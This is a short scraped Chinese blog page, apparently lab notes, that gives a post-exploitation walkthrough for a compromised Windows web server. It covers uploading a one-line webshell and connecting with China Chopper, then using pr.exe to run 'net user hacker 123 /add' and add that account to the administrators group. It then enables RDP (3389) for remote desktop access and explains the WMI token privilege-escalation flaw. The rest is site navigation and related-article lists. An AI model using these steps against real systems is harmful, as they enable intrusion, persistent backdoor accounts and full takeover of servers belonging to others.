實驗(1)
在注入成功後,登入後臺管理,上傳一句話,菜刀鏈接
上傳3389,pr,cmdspa
打開虛擬終端 而且切換到上傳目錄下,code
執行pr命令,pr 「net user hacker 123 /add」,添加用戶讓後給用戶管理員權限,pr 「net localgroup administrators hacker /add」blog
pr 執行3389 進程
成功後,mstsc遠程鏈接桌面,而且登陸ip
pr.exe 提權:
Windows跟蹤註冊表項的ACL權限提高漏洞
Windows管理規範(WMI)提供程序沒有正確地隔離NetworkService或LocalService賬號下運行的進程,同一賬號下運行的兩個獨立進程能夠徹底訪問對方的文件句柄、註冊表項等資源。WMI提供程序主機進程在某些狀況下會持有SYSTEM令牌,若是攻擊者能夠以 NetworkService或LocalService賬號訪問計算機,攻擊者就能夠執行代碼探索SYSTEM令牌的WMI提供程序主機進程。一旦找到了SYSTEM令牌,就能夠得到SYSTEM權限的提高。資源
相關文章
- 1. 實驗1
- 2. ccna實驗-1
- 3. Assemble 實驗1
- 4. 實驗(1)
- 5. linux實驗1
- 6. Hive實驗1
- 7. 實驗1 VLAN
- 8. Linux實驗1
- 9. Java實驗 - 1
- 10. OSPF實驗1
- 更多相關文章...
- • XML 驗證 - XML 教程
- • DTD 驗證 - DTD 教程
- • ☆基於Java Instrument的Agent實現
- • Docker容器實戰(一) - 封神Server端技術
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. python的安裝和Hello,World編寫
- 2. 重磅解讀:K8s Cluster Autoscaler模塊及對應華爲雲插件Deep Dive
- 3. 鴻蒙學習筆記2(永不斷更)
- 4. static關鍵字 和構造代碼塊
- 5. JVM筆記
- 6. 無法啓動 C/C++ 語言服務器。IntelliSense 功能將被禁用。錯誤: Missing binary at c:\Users\MSI-NB\.vscode\extensions\ms-vsc
- 7. 【Hive】Hive返回碼狀態含義
- 8. Java樹形結構遞歸(以時間換空間)和非遞歸(以空間換時間)
- 9. 數據預處理---缺失值
- 10. 都要2021年了,現代C++有什麼值得我們學習的?
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 實驗1
- 2. ccna實驗-1
- 3. Assemble 實驗1
- 4. 實驗(1)
- 5. linux實驗1
- 6. Hive實驗1
- 7. 實驗1 VLAN
- 8. Linux實驗1
- 9. Java實驗 - 1
- 10. OSPF實驗1